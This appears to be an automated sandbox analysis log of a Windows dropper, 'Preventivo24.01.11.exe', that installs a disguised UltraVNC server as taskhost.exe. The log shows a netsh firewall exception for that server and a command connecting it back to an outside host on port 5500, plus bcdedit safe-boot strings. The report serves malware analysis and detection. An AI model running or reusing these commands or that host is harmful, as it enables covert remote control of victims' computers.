Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 2
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /im rundll32.exe /f
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 2
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe Reg Query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles" /S /V Description
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe	Process created: unknown unknown
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe	Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
Source: C:\Games\viewer.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Games\c.cmd" "
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\mode.com Mode 90,20
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c Set GUID[ 2>Nul
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c Reg Query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles" /S /V Description
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" type C:\Games\cmd.txt"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe Reg Query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles" /S /V Description
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Games\viewer.exe C:\Games\viewer.exe /HideWindow C:\Games\once.cmd
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Games\viewer.exe C:\Games\viewer.exe /HideWindow C:\Games\cmmc.cmd
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 20
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 20
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 20
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\mode.com Mode 90,20
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 20
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process created: unknown unknown
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process created: unknown unknown
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2112 --field-trial-handle=1752,i,9597563481280373609,10748529696492250759,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process created: unknown unknown
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process created: unknown unknown
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process created: unknown unknown
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process created: unknown unknown
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process created: unknown unknown
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe Reg Query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles" /S /V Description
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\mode.com Mode 90,20
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\netsh.exe netsh firewall add allowedprogram program="C:\Games\taskhost.exe" name="MyApplication" mode=ENABLE scope=ALL
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\netsh.exe netsh firewall add allowedprogram program="C:\Games\taskhost.exe" name="MyApplicatio" mode=ENABLE scope=ALL profile=ALL
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic process where (name="taskhost.exe") get commandline
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /i "taskhost.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Games\taskhost.exe C:\Games\taskhost.exe -autoreconnect ID:5383948 -connect vnvariant2024.ddnsfree.com:5500 -run
Source: C:\Games\viewer.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Games\once.cmd" "
Source: C:\Games\viewer.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Games\cmmc.cmd" "
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c Set GUID[ 2>Nul
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c Reg Query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles" /S /V Description
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe Reg Query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles" /S /V Description

Source: C:\Users\user\Desktop\Preventivo24.01.11.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32

Source: C:\Users\user\Desktop\Preventivo24.01.11.exe

File written: C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C\WindowsVolume\Games\UltraVNC.ini

Jump to behavior

Source: C:\Games\taskhost.exe

File opened: C:\Windows\SysWOW64\RICHED32.DLL

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: Preventivo24.01.11.exe

Static PE information: Virtual size of .text is bigger than: 0x100000

Source: Preventivo24.01.11.exe

Static file information: File size 5955744 > 1048576

Source: Preventivo24.01.11.exe

Static PE information: Raw size of .text is bigger than: 0x100000 < 0x295c00

Source: Preventivo24.01.11.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: Preventivo24.01.11.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: Preventivo24.01.11.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: Preventivo24.01.11.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Preventivo24.01.11.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: Preventivo24.01.11.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: Preventivo24.01.11.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE

Source: Preventivo24.01.11.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: wininet.pdb source: Preventivo24.01.11.exe, 00000000.00000003.1664234459.00000000099BB000.00000004.00000020.00020000.00000000.sdmp, shi6E82.tmp.0.dr
Source:	Binary string: C:\ReleaseAI\win\Release\custact\x86\viewer.pdbD source: Preventivo24.01.11.exe, 00000000.00000003.1649858263.00000000099B0000.00000004.00001000.00020000.00000000.sdmp, main1.msi.0.dr
Source:	Binary string: C:\Users\rudi\Desktop\git_ultravnc\winvnc\Release\winvnc.pdbGCTL source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B0D5000.00000004.00001000.00020000.00000000.sdmp, taskhost.exe, 00000029.00000002.3495148727.000000000022C000.00000002.00000001.01000000.0000000D.sdmp, taskhost.exe.0.dr
Source:	Binary string: C:\Users\rudi\Desktop\Windows-driver-samples-master\video\UVncVirtualDisplay\Release\UVncVirtualDisplay.pdb source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmp, UVncVirtualDisplay.dll.0.dr
Source:	Binary string: C:\Users\rudi\Desktop\ddengine_20\Release\ddengine.pdb! source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmp, ddengine.dll.0.dr
Source:	Binary string: C:\Users\rudi\Desktop\git_ultravnc\winvnc\Release\vnchooks.pdb source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmp, vnchooks.dll.0.dr
Source:	Binary string: C:\ReleaseAI\win\Release\custact\x86\Prereq.pdb source: Preventivo24.01.11.exe, 00000000.00000003.1649858263.00000000099B0000.00000004.00001000.00020000.00000000.sdmp, main1.msi.0.dr
Source:	Binary string: C:\Users\rudi\Desktop\git_ultravnc\winvnc\Release\winvnc.pdb source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B0D5000.00000004.00001000.00020000.00000000.sdmp, taskhost.exe, 00000029.00000002.3495148727.000000000022C000.00000002.00000001.01000000.0000000D.sdmp, taskhost.exe.0.dr
Source:	Binary string: C:\Users\rudi\Desktop\ddengine_20\Release\ddengine.pdb source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmp, ddengine.dll.0.dr
Source:	Binary string: wininet.pdbUGP source: Preventivo24.01.11.exe, 00000000.00000003.1664234459.00000000099BB000.00000004.00000020.00020000.00000000.sdmp, shi6E82.tmp.0.dr
Source:	Binary string: C:\JobRelease\win\Release\custact\x86\AICustAct.pdb source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000AE50000.00000004.00001000.00020000.00000000.sdmp, powercfg.msi.0.dr
Source:	Binary string: C:\JobRelease\win\Release\custact\x86\viewer.pdb source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmp, Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000AE50000.00000004.00001000.00020000.00000000.sdmp, viewer.exe, 00000006.00000000.1690846297.0000000000659000.00000002.00000001.01000000.00000009.sdmp, viewer.exe, 00000006.00000002.1875272128.0000000000659000.00000002.00000001.01000000.00000009.sdmp, viewer.exe, 0000000F.00000002.3495250511.0000000000659000.00000002.00000001.01000000.00000009.sdmp, viewer.exe, 0000000F.00000000.1747475344.0000000000659000.00000002.00000001.01000000.00000009.sdmp, viewer.exe, 0000002A.00000002.1871122900.0000000000659000.00000002.00000001.01000000.00000009.sdmp, viewer.exe, 0000002A.00000000.1862131314.0000000000659000.00000002.00000001.01000000.00000009.sdmp, viewer.exe, 0000002B.00000002.1877402564.0000000000659000.00000002.00000001.01000000.00000009.sdmp, viewer.exe, 0000002B.00000000.1863267198.0000000000659000.00000002.00000001.01000000.00000009.sdmp, viewer.exe.0.dr, powercfg.msi.0.dr
Source:	Binary string: C:\JobRelease\win\Release\custact\x86\AICustAct.pdbd source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000AE50000.00000004.00001000.00020000.00000000.sdmp, powercfg.msi.0.dr
Source:	Binary string: C:\ReleaseAI\win\Release\custact\x86\lzmaextractor.pdb source: Preventivo24.01.11.exe, 00000000.00000003.1649858263.00000000099B0000.00000004.00001000.00020000.00000000.sdmp, main1.msi.0.dr
Source:	Binary string: C:\ReleaseAI\win\Release\custact\x86\AICustAct.pdb source: Preventivo24.01.11.exe, 00000000.00000003.1649858263.00000000099B0000.00000004.00001000.00020000.00000000.sdmp, main1.msi.0.dr, MSI6F00.tmp.0.dr, MSI6FDC.tmp.0.dr, MSI6FFC.tmp.0.dr
Source:	Binary string: C:\ReleaseAI\win\Release\custact\x86\viewer.pdb source: Preventivo24.01.11.exe, 00000000.00000003.1649858263.00000000099B0000.00000004.00001000.00020000.00000000.sdmp, main1.msi.0.dr
Source:	Binary string: C:\ReleaseAI\win\Release\stubs\x86\ExternalUi.pdb source: Preventivo24.01.11.exe
Source:	Binary string: C:\JobRelease\win\Release\custact\x86\viewer.pdb0 source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmp, Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000AE50000.00000004.00001000.00020000.00000000.sdmp, viewer.exe, 00000006.00000000.1690846297.0000000000659000.00000002.00000001.01000000.00000009.sdmp, viewer.exe, 00000006.00000002.1875272128.0000000000659000.00000002.00000001.01000000.00000009.sdmp, viewer.exe, 0000000F.00000002.3495250511.0000000000659000.00000002.00000001.01000000.00000009.sdmp, viewer.exe, 0000000F.00000000.1747475344.0000000000659000.00000002.00000001.01000000.00000009.sdmp, viewer.exe, 0000002A.00000002.1871122900.0000000000659000.00000002.00000001.01000000.00000009.sdmp, viewer.exe, 0000002A.00000000.1862131314.0000000000659000.00000002.00000001.01000000.00000009.sdmp, viewer.exe, 0000002B.00000002.1877402564.0000000000659000.00000002.00000001.01000000.00000009.sdmp, viewer.exe, 0000002B.00000000.1863267198.0000000000659000.00000002.00000001.01000000.00000009.sdmp, viewer.exe.0.dr, powercfg.msi.0.dr

Source: Preventivo24.01.11.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: Preventivo24.01.11.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: Preventivo24.01.11.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: Preventivo24.01.11.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: Preventivo24.01.11.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Source: shi6E82.tmp.0.dr

Static PE information: 0xC7FEC470 [Wed Apr 29 05:06:56 2076 UTC]

Source: C:\Users\user\Desktop\Preventivo24.01.11.exe

Code function: 0_2_00FC0CA0 LoadLibraryW,GetProcAddress,FreeLibrary,

Source: Preventivo24.01.11.exe	Static PE information: section name: .didat
Source: ddengine.dll.0.dr	Static PE information: section name: .SharedD
Source: shi6E82.tmp.0.dr	Static PE information: section name: .wpp_sf
Source: shi6E82.tmp.0.dr	Static PE information: section name: .didat

Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	Code function: 0_3_009F6820 pushfd ; iretd
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	Code function: 0_3_009F6064 push esp; retf
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	Code function: 0_3_009A8900 push ebp; ret
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	Code function: 0_3_009AA5B8 push eax; ret
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	Code function: 0_3_009A8DA4 push ecx; ret
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	Code function: 0_3_00968443 push ds; retf
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	Code function: 0_3_00963A48 push ecx; ret
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	Code function: 0_3_009683CF push ds; retf
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	Code function: 0_3_009705F3 push 00000078h; retf
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	Code function: 0_2_00F9A4B0 push ecx; mov dword ptr [esp], 3F800000h
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	Code function: 0_2_0108B2DE push ecx; ret
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	Code function: 0_2_00E9D5CA push esi; ret
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	Code function: 0_2_00E9FB10 push ecx; mov dword ptr [esp], ecx
Source: C:\Games\viewer.exe	Code function: 6_2_006350CC push ecx; ret
Source: C:\Games\viewer.exe	Code function: 6_2_00635676 push ecx; ret
Source: C:\Games\taskhost.exe	Code function: 41_2_001E6143 push ecx; ret
Source: C:\Games\taskhost.exe	Code function: 41_2_000A51FF pushad ; iretd
Source: C:\Games\taskhost.exe	Code function: 41_2_000AE25B pushad ; iretd
Source: C:\Games\taskhost.exe	Code function: 41_2_000AE263 pushad ; iretd
Source: C:\Games\taskhost.exe	Code function: 41_2_000A5265 push 60F5C5F1h; iretd
Source: C:\Games\taskhost.exe	Code function: 41_2_000AE27D pushad ; iretd
Source: C:\Games\taskhost.exe	Code function: 41_2_000AE275 pushad ; iretd
Source: C:\Games\taskhost.exe	Code function: 41_2_000AC5A6 pushad ; iretd
Source: C:\Games\taskhost.exe	Code function: 41_2_000AE5FB pushad ; iretd
Source: C:\Games\taskhost.exe	Code function: 41_2_000AE603 pushad ; iretd
Source: C:\Games\taskhost.exe	Code function: 41_2_000AE61D pushad ; iretd
Source: C:\Games\taskhost.exe	Code function: 41_2_000AE615 pushad ; iretd
Source: C:\Games\taskhost.exe	Code function: 41_2_000ADEBB pushad ; iretd
Source: C:\Games\taskhost.exe	Code function: 41_2_000ADEC3 pushad ; iretd
Source: C:\Games\taskhost.exe	Code function: 41_2_000ADEDD pushad ; iretd
Source: C:\Games\taskhost.exe	Code function: 41_2_000ADED5 pushad ; iretd

Persistence and Installation Behavior

Uses cmd line tools excessively to alter registry or file data

Source: C:\Windows\SysWOW64\cmd.exe	Process created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: reg.exe

Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	File created: C:\Users\user\AppData\Local\Temp\MSI6FDC.tmp	Jump to dropped file
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	File created: C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C\WindowsVolume\Games\taskhost.exe	Jump to dropped file
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	File created: C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C\WindowsVolume\Games\viewer.exe	Jump to dropped file
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	File created: C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C\WindowsVolume\Games\vnchooks.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	File created: C:\Users\user\AppData\Local\Temp\MSI6FFC.tmp	Jump to dropped file
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	File created: C:\Users\user\AppData\Local\Temp\shi6E82.tmp	Jump to dropped file
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	File created: C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C\WindowsVolume\Games\ddengine.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	File created: C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C\WindowsVolume\Games\UVncVirtualDisplay\UVncVirtualDisplay.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	File created: C:\Users\user\AppData\Local\Temp\MSI6F00.tmp	Jump to dropped file

Source: taskhost.exe.0.dr	Binary or memory string: bcdedit.exe
Source: taskhost.exe.0.dr	Binary or memory string: RegisterServiceCtrlHandlerExAadvapi32.dllProvides secure remote desktop sharingSYSTEM\CurrentControlSet\Services\%sFailed to open service control managerTcpipFailed: Permission deniedFailed to create a new serviceFailed to open the serviceFailed to query service statusFailed to delete the service" -inifile -serviceNetworkSYSTEM\CurrentControlSet\Control\SafeBoot\%s\%sServiceSYSTEMDRIVE/boot.inidefaultboot loaderoperating systems /safeboot:networkWow64DisableWow64FsRedirectionkernel32Wow64RevertWow64FsRedirectionSystemRoot\system32\bcdedit.exe/set safeboot networkSeShutdownPrivilege-rebootforce-rebootsafemode/deletevalue safebootwinsta.dllWinStationConnectWLockWorkstation failed with error 0x%0lXWTSEnumerateSessionsAwtsapi32WTSFreeMemoryConsole -preconnect -service_rdp_run -service_run Global\SessionEventUltraGlobal\SessionEventUltraPreConnectGlobal\EndSessionEventGlobal\SessionUltraPreConnectsas.dllSendSASWinsta0\Winlogon\winsta.dllWinStationQueryInformationW\\.\Pipe\TerminalServer\SystemExecSrvr\%dwinlogon.exeWTSEnumerateProcessesASeTcbPrivilegeRICHED32.DLL------------------------------------------------------------------------------------------------------------------------

Source: C:\Games\taskhost.exe	Code function: 41_2_000CAEE0 GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileStringA,GetPrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileStringA,GetPrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileStringA,GetPrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileStructA,GetPrivateProfileStructA,GetPrivateProfileStructA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileStringA,GetPrivateProfileStringA,GetPrivateProfileStringA,GetPrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,
Source: C:\Games\taskhost.exe	Code function: 41_2_000C7AE0 GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,WritePrivateProfileStringA,GetLastError,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileStringA,GetPrivateProfileStringA,GetPrivateProfileStringA,GetPrivateProfileStringA,WritePrivateProfileStringA,WritePrivateProfileStringA,WritePrivateProfileStringA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileStringA,GetPrivateProfileStringA,GetPrivateProfileStringA,GetPrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,WritePrivateProfileStringA,WritePrivateProfileStringA,WritePrivateProfileStringA,WritePrivateProfileStringA,wsprintfA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,WritePrivateProfileStringA,wsprintfA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileStringA,GetPrivateProfileStringA,GetPrivateProfileStringA,WritePrivateProfileStringA,WritePrivateProfileStringA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,WritePrivateProfileStringA,wsprintfA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,WritePrivateProfileStringA,wsprintfA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,
Source: C:\Games\taskhost.exe	Code function: 41_2_000D37A0 GetPrivateProfileIntA,EnumDisplaySettingsA,LoadLibraryA,GetProcAddress,FreeLibrary,FreeLibrary,GetFileVersionInfoSizeA,GetFileVersionInfoA,VerQueryValueA,VerQueryValueA,VerQueryValueA,CreateDCA,DeleteDC,

Source: C:\Games\viewer.exe

Code function: 6_2_00633D28 GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
Source: C:\Games\viewer.exe	Registry key monitored for changes: HKEY_CURRENT_USER_Classes

Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Games\viewer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX
